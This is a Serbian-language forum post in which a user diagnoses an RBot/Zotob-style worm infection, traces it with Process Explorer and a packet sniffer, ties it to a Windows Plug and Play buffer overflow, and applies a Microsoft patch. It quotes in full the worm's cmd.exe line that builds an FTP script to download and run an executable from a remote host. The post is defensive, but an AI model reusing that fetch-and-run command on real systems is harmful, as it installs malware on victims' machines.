Da li još neko ima problema sa RBot "sojem" virusa?
Ja trenutno koristim Telekom Dialup (nisam siguran da li ovo ima veze sa provajderom) i nedavno mi je Kaspersky Antivirus prijavio tri datoteke:
c:\winows\system32\mysvcc.exe
c:\winows\system32\recsl.exe
c:\winows\system32\salvage.exe
Zabranio sam im pristup i obrisao ih, ali su nastavile da se pojavljuju. I pored KAV!!!
Onda sam pomoću "Process Explorer"-a <
http://www.microsoft.com/techn...ndThreads/ProcessExplorer.mspx > probao da vidim ko ih skida i imao sam šta da vidim - lsass.exe
Onda sam video da lsass.exe pokreće cmd.exe, tj. shell sa sledećim parametarom:
Code:
cmd /c echo open recsl.d67e9cggg.info 21 >appmr.dll &echo user mynew slrecd >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo recsl.exe >>appmr.dll &echo recsl.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &recsl.exe
Samo što je svaki put drugi server a izvršna datoteka je ili recsl.exe ili salvage.exe
Iz neutvrđenog razloga datoteke se samo kreiraju, ali su prazne (veličina=0). Verovatno ih KAV "ubije" na vreme.
Zatim sam skinuo "SmartSniff" i zabeležio pakete, zajedno sa ip adresama.
Zanimljivo je da su sve adrese iz Srbije. Uglavnom su adrese 212.200.*.* (razni podprovajderi Telekoma Srbija, da ih sad ne nabrajam) i 213.244.*.* (verat.net).
Potražio sam rešenje na netu i našao da se radi o sledećem problemu:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1983
"Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm."
Čije je rešenje:
Security Update for Windows XP (KB899588)
http://www.microsoft.com/downl...15E095E207F&displaylang=en
Skinuo sam dotični Update i pokrenuo ga, a ovo pišem pre restartovanja.
Očekujte "Edit" uskoro.
Takođe, našao sam na netu da je moguće ne dozvoliti korisnicima koji nemaju ovu zakrpu da se povežu na net.
Pitanje za naše provajdere: Šta mislite o tome?
P0Z!
# Emancipate yourselves from mental slavery;
# None but ourselves can free our minds.
# Bob Marley, "Redemption Song"